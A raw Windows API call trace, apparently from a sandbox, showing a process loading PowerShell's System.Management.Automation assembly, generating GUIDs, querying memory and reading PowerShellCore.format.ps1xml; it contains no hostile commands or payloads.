	[0544.329] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xd7fbf85a, Data2=0xf2c7, Data3=0x4e5b, Data4=([0]=0x87, [1]=0xc5, [2]=0xa, [3]=0xe6, [4]=0xc, [5]=0x54, [6]=0x3a, [7]=0xdd))) returned 0x0
	[0544.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.379] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xe0f636bd, Data2=0xfb34, Data3=0x4161, Data4=([0]=0x80, [1]=0xc4, [2]=0xa1, [3]=0x38, [4]=0x83, [5]=0x5f, [6]=0x53, [7]=0xd7))) returned 0x0
	[0545.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.384] VirtualQuery (in: lpAddress=0xab5a0, lpBuffer=0xac460, dwLength=0x30 | out: lpBuffer=0xac460*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.385] VirtualQuery (in: lpAddress=0xab630, lpBuffer=0xac4f0, dwLength=0x30 | out: lpBuffer=0xac4f0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.387] VirtualQuery (in: lpAddress=0xabdb0, lpBuffer=0xacc70, dwLength=0x30 | out: lpBuffer=0xacc70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.388] VirtualQuery (in: lpAddress=0xabdb0, lpBuffer=0xacc70, dwLength=0x30 | out: lpBuffer=0xacc70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.390] VirtualQuery (in: lpAddress=0xabdb0, lpBuffer=0xacc70, dwLength=0x30 | out: lpBuffer=0xacc70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.391] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x687b58fb, Data2=0x1243, Data3=0x4b0e, Data4=([0]=0x8d, [1]=0xbd, [2]=0x64, [3]=0x85, [4]=0x99, [5]=0xb8, [6]=0x6a, [7]=0x9))) returned 0x0
	[0545.392] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xc7e31474, Data2=0xfe34, Data3=0x4dec, Data4=([0]=0x94, [1]=0x72, [2]=0x82, [3]=0x57, [4]=0x70, [5]=0x6f, [6]=0x1f, [7]=0x41))) returned 0x0
	[0545.392] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xe1a14aab, Data2=0x1902, Data3=0x4a18, Data4=([0]=0xa0, [1]=0x40, [2]=0xd7, [3]=0x4b, [4]=0x68, [5]=0xa7, [6]=0x9b, [7]=0xf0))) returned 0x0
	[0546.363] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xb4d2be20, Data2=0x9e00, Data3=0x400d, Data4=([0]=0xa4, [1]=0xd9, [2]=0x49, [3]=0x37, [4]=0x6d, [5]=0xa1, [6]=0x80, [7]=0xe3))) returned 0x0
	[0546.364] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x3c838f28, Data2=0x42e1, Data3=0x4096, Data4=([0]=0x86, [1]=0xef, [2]=0xf2, [3]=0xea, [4]=0xd7, [5]=0x67, [6]=0x8, [7]=0x35))) returned 0x0
	[0546.364] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xa8cb6e41, Data2=0x2b97, Data3=0x4171, Data4=([0]=0xa8, [1]=0xb8, [2]=0xa6, [3]=0xd9, [4]=0x7, [5]=0x6, [6]=0x1a, [7]=0x1))) returned 0x0
	[0546.364] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x826aec89, Data2=0x2a54, Data3=0x4cfa, Data4=([0]=0xa2, [1]=0xd7, [2]=0x35, [3]=0xce, [4]=0x6e, [5]=0xb8, [6]=0x22, [7]=0x69))) returned 0x0
	[0546.365] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xe9ec4ec3, Data2=0x9efc, Data3=0x4ad6, Data4=([0]=0x8d, [1]=0xa7, [2]=0xbc, [3]=0x5f, [4]=0x9, [5]=0x8, [6]=0xe, [7]=0xdb))) returned 0x0
	[0546.365] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xc709e160, Data2=0x63c2, Data3=0x40e7, Data4=([0]=0xbe, [1]=0xb5, [2]=0x8a, [3]=0x25, [4]=0xe, [5]=0xc5, [6]=0x9e, [7]=0x66))) returned 0x0
	[0546.365] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x8a9ee0a1, Data2=0xbca7, Data3=0x49aa, Data4=([0]=0x8a, [1]=0xc, [2]=0x2f, [3]=0x96, [4]=0xde, [5]=0x70, [6]=0xad, [7]=0x99))) returned 0x0
	[0546.365] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xb85afa6e, Data2=0xde91, Data3=0x44ca, Data4=([0]=0xba, [1]=0x48, [2]=0xe8, [3]=0xe9, [4]=0xb1, [5]=0x42, [6]=0x88, [7]=0xe8))) returned 0x0
	[0546.365] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x13fd508b, Data2=0x59b1, Data3=0x4922, Data4=([0]=0x85, [1]=0x2c, [2]=0xed, [3]=0x9f, [4]=0x13, [5]=0xc9, [6]=0x7a, [7]=0x54))) returned 0x0
	[0546.366] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xf6e6d9eb, Data2=0xd67f, Data3=0x4028, Data4=([0]=0xb5, [1]=0xc5, [2]=0x75, [3]=0xf1, [4]=0xc, [5]=0x8e, [6]=0x7d, [7]=0x43))) returned 0x0
	[0546.367] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x14d58371, Data2=0x8d3d, Data3=0x4e8c, Data4=([0]=0x80, [1]=0xd4, [2]=0xfc, [3]=0xc3, [4]=0xef, [5]=0x52, [6]=0x37, [7]=0xe4))) returned 0x0
	[0546.368] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x7a370faf, Data2=0x7b8e, Data3=0x478e, Data4=([0]=0x93, [1]=0x2b, [2]=0x86, [3]=0x79, [4]=0x1f, [5]=0x7, [6]=0x91, [7]=0x89))) returned 0x0
	[0546.369] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xe9caecfe, Data2=0xa0cf, Data3=0x4726, Data4=([0]=0xaa, [1]=0x61, [2]=0x19, [3]=0xe6, [4]=0x4a, [5]=0x4b, [6]=0xc2, [7]=0xa1))) returned 0x0
	[0546.369] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x931f04f0, Data2=0x9f10, Data3=0x45b4, Data4=([0]=0x8d, [1]=0xd8, [2]=0xd8, [3]=0xf8, [4]=0x39, [5]=0x7b, [6]=0x7f, [7]=0x38))) returned 0x0
	[0546.369] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xd30f577, Data2=0xe292, Data3=0x4fa1, Data4=([0]=0x9a, [1]=0x82, [2]=0xa, [3]=0x73, [4]=0xfb, [5]=0xae, [6]=0xb8, [7]=0xb4))) returned 0x0
	[0546.369] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xbd96261d, Data2=0xbb0a, Data3=0x4124, Data4=([0]=0xb7, [1]=0xe9, [2]=0x66, [3]=0x5f, [4]=0xfb, [5]=0x36, [6]=0x7c, [7]=0x69))) returned 0x0
	[0546.369] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x9d3fd92e, Data2=0x9bb, Data3=0x4f62, Data4=([0]=0x9c, [1]=0x74, [2]=0x2d, [3]=0x29, [4]=0x6a, [5]=0xbe, [6]=0xfd, [7]=0x88))) returned 0x0
	[0546.370] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xd6d13d05, Data2=0xd504, Data3=0x4aba, Data4=([0]=0xb8, [1]=0x8, [2]=0xda, [3]=0xeb, [4]=0x9c, [5]=0xa7, [6]=0x4f, [7]=0x5c))) returned 0x0
	[0546.370] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xf801fb97, Data2=0x8e1b, Data3=0x41f1, Data4=([0]=0x80, [1]=0xbb, [2]=0xeb, [3]=0xfe, [4]=0x13, [5]=0xa8, [6]=0xe, [7]=0x6c))) returned 0x0
	[0546.370] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0546.370] GetFileType (hFile=0x324) returned 0x1
	[0546.370] SetErrorMode (uMode=0x1) returned 0x1
	[0546.370] GetFileType (hFile=0x324) returned 0x1
	[0546.370] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.371] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.371] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.371] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.371] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.371] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.372] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.372] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.372] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.376] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.377] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.377] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.378] ReadFile (in: hFile=0x324, lpBuffer=0x302cba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x302cba8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
